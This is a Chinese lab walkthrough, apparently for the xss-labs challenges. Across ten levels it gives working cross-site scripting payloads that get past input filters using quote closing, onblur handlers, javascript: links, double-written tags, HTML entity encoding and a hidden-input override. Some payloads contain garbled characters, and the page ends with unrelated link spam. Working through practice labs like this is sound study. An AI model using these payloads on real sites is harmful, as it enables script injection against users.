当前位置: 首页 > news >正文

济南网站建设网站网站建设预算申请表

济南网站建设网站,网站建设预算申请表,免费网站建设模版云盘,游戏推广员到底犯不犯法终极测试代码 <sCr<ScRiPt>IPT>OonN"\/(hrHRefEF)</sCr</ScRiPt>IPT> 第一关&#xff08;没有任何过滤&#xff09; 使用终极测试代码&#xff0c;查看源码 发现没有任何过滤&#xff0c;直接使用javascrupt中的alert弹框 <script>aler…

终极测试代码

<sCr<ScRiPt>IPT>OonN'"\/(hrHRefEF)</sCr</ScRiPt>IPT>

第一关(没有任何过滤)

使用终极测试代码,查看源码

发现没有任何过滤,直接使用javascrupt中的alert弹框

<script>alert('wj')</script>

第二关(闭合方式)

先用终极测试代码,查看源码

<input name=keyword  value="<script>alert(/xss/)</script>">

我们要先闭合前面,然后注释掉后面

<input name=keyword  value=""><script>alert(/xss/)</script>//">

"><script>alert(/wj/)<script>//

第三关(过滤 < 和 ")

先用终极测试代码,查看源码

 value='&lt;sCr&lt;ScRiPt&gt;IPT&gt;OonN'&quot;\/(hrHRefEF)&lt;/sCr&lt;/ScRiPt&gt;

IPT&gt;'>
发现< 和 " 被实体化,不能使用,但是我们可以使用Javascript事件。

这里使用onblur事件。然后闭合方式是 ' 

<input name=keyword  value=' 'οnblur='alert(/xss/)' ''>

'onblur='alert(/1/)'

第四关(注意闭合方式)

先用终极测试代码,查看源码

发现没有变化

我们尝试第三关的方式,注意:这里的闭关方式是 "

<input name=keyword  value=" "οnblur='alert(/1/)' ">

"onblur='alert(/1/)'

第五关(大小写,script,on.)

先用终极测试代码,查看源码

value="<scr<scr_ipt>ipt>oo_nn'"\/(hrhrefef)</scr</script>ipt>"

过滤了大小写,script,on.
javascript 伪协议   a标签要独立运行,所以要闭合前面的<input>标签
value=" "><a href= "javascript:alert(/xss/)">click me</a> "

"><a href = "javascript:alert('wj')">click me</a>

第六关(过滤了on)

先用终极测试代码,查看源码

value="<sCr<ScRiPt>IPT>Oo_nN'"\/(hrHRefEF)</sCr</ScRiPt>IPT>"
过滤了on,
value=""><a href = "javascript:alert('wj')">click me</a>"

"><a hRef = "javascript:alert('wj')">click me</a>

第七关(过滤)

我们用第六关的代码试试

<input name=keyword  value=""><a  = "java:alert('wj')">click me</a>">

发现href和script被过滤了,我们可以试试双写

<input name=keyword  value=" "><scrscriptipt>alert(/xss/)</scrscriptipt>">

"><scrscriptipt>alert(/xss/)</scrscriptipt>

第八关(html编码)

先用终极测试代码,查看源码

value="&lt;scr&lt;script&gt;ipt&gt;oonn'&quot;\/(hrhrefef)&lt;/scr&lt;/script&gt;ipt&gt;">
发现过滤了大小写,< .

所以使用html实体编码。 

javascript:alert('wj')&#x6a;&#x61;&#x76;&#x61;&#x73;&#x63;&#x72;&#x69;&#x70;&#x74;&#x3a;&#x61;&#x6c;
&#x65;&#x72;&#x74;&#x28;&#x27;&#x77;&#x6a;&#x27;&#x29;

第九关(格式http://)

使用第八关方式,发现代码不合法。需要使用http://.

&#x6a;&#x61;&#x76;&#x61;&#x73;&#x63;&#x72;&#x69;&#x70;&#x74;&#x3a;&#x61;
&#x6c;&#x65;&#x72;&#x74;&#x28;&#x27;&#x77;&#x6a;&#x27;&#x29;//http://

第十关(搜索框被隐藏)

发现没有搜索框,查看源码

发现是使用了hidden,隐藏了

我们可以修改他,让hidden失去作用
<input name="t_sort" value="" οnblur= 'alert(/xss/)' >type="hidden">

onblur='alert(/1/)'>

http://www.yayakq.cn/news/573391/

相关文章:

  • 做汽车配件的都在那个网站做呀深圳宝安区哪里好玩
  • asp.net当前网站路径网站建设推广文章
  • 做移动网站优化软wordpress显示全英文
  • 网站建设的具体奖罚措施国家企业信用信息公示官网
  • 网站上线盈利logo在线设计软件免费版
  • 网站建设平台官网荣成网站制作公司
  • 网站推广开户备案域名购买交易
  • 如何学习网站开发网站建设的费用结构包括
  • 黑龙江建设网站打不开建设银行官方网站app下载
  • 南宁网站改版网页设计尺寸大小指的是什么
  • 铜陵县住房和城乡建设局网站wordpress monster
  • 网站建设后如何检测做海外网站推广
  • 外贸网站建设怎么选电商网站建设方案道客巴巴
  • 建设外贸网站哪家好重庆安全监督工程信息网
  • 做a小视频网站网站建设服务代理商
  • 三只小猪的题目登网站做佛山百度网站快速优化
  • 网站赚钱的方式设计网站技术
  • 哈尔滨的网站设计企业网站建设 优化
  • 东莞网站设计网址做邮箱网站
  • 攀枝花移动网站建设wordpress怎么切换成中文的
  • 秀洲区建设局网站深圳定制家具厂排名
  • 建立大型网站吗建设项目验收网站
  • 杭州亿向建设有限公司 网站wordpress 编辑器 修改
  • 衣服网站模板怎么键卖东西的网站
  • 有什么好网站做浏览器主页起飞页怎么做网站
  • 茶叶网站建设模板上海网站搭建
  • 酒店做网站做百度推广网站找谁好
  • 旅行社网站建设规划书网站建设嗟商文件
  • 做包装的网站有哪些高端网页开发
  • 招聘网站哪个好怎么登陆wordpress后台